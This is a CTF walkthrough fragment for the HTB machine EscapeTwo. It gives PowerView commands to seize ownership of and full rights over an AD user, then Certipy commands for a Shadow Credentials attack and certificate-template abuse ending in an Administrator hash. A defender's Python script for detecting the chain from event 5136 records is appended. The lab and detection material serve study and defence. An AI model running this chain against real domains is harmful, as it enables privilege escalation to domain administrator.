
write-owner

CTF Walkthrough: HTB - EscapeTwo | HTB Writeups

powershell -ep bypass; Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity 'targetUser' -OwnerIdentity 'YouOwntheUser'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "targetUser" -PrincipalIdentity "YouOwntheUser"

Verify

Get-DomainUser | Where-Object { $_.Name -like "*YouOwntheUser*" } | Select-Object Name, Objectsid
Get-DomainObjectAcl -Identity 'targetUser' | Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' }

With full control over the target object, we can perform a Shadow Credentials attack, reset the password, or perform a targeted Kerberoasting attack.

Shadow Credential attack

Get NT hash of ca_svc

certipy shadow auto -u username@domain -p pass -account ca_svc -dc-ip 10.10.10.51

Find the vulnerable template

certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable

Exploit a vulnerable template

certipy req -u ca_svc@domain -hashes :hash -ca CertificateAuthorityName -template VulnerableTemplate -upn Administrator@sequel.htb

Get administrator hash

certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb
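Added example, not part of the original walkthrough: a defender-side check for the sequence above (owner/ACL rewrite on an account, then a Shadow Credentials key write to it), run over records shaped like Security event 5136. It assumes Directory Service Changes auditing with a SACL covering these attributes; the sample events, the `detect` function and the 30-minute window are constructed for illustration.

```python
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"          # OperationType string for "Value Added" in event 5136
WINDOW = timedelta(minutes=30)   # assumed correlation window, tune per environment

# Constructed sample records: field names follow event 5136 EventData, values are invented.
SAMPLE_EVENTS = [
    {"TimeCreated": "2025-01-15T10:02:11", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=svc_example,CN=Users,DC=example,DC=test",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": VALUE_ADDED},
    {"TimeCreated": "2025-01-15T10:04:40", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=svc_example,CN=Users,DC=example,DC=test",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    {"TimeCreated": "2025-01-15T11:30:00", "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=example,DC=test",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
]

def _cn(dn):
    """First RDN value of a distinguished name, lowercased."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def detect(events, window=WINDOW):
    """Flag key-credential writes made by an account other than the object itself;
    use the stronger rule name when the same account changed that object's
    security descriptor (owner or DACL) within `window` beforehand."""
    last_acl_change = {}   # (subject, object DN) -> time of last descriptor write
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["OperationType"] != VALUE_ADDED:
            continue
        when = datetime.fromisoformat(ev["TimeCreated"])
        subject = ev["SubjectUserName"].lower()
        dn = ev["ObjectDN"].lower()
        attr = ev["AttributeLDAPDisplayName"].lower()
        if attr == "ntsecuritydescriptor":
            last_acl_change[(subject, dn)] = when
        elif attr == "msds-keycredentiallink":
            if subject.rstrip("$") == _cn(dn):
                continue   # heuristic: account enrolling a key on itself
            prior = last_acl_change.get((subject, dn))
            chained = prior is not None and when - prior <= window
            rule = "acl-change-then-keycred" if chained else "keycred-write-by-other"
            findings.append({"rule": rule, "subject": subject,
                             "object": dn, "time": ev["TimeCreated"]})
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The self-write exclusion compares the subject name with the object's CN, which is only a heuristic; in production, compare SIDs resolved from the directory instead.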
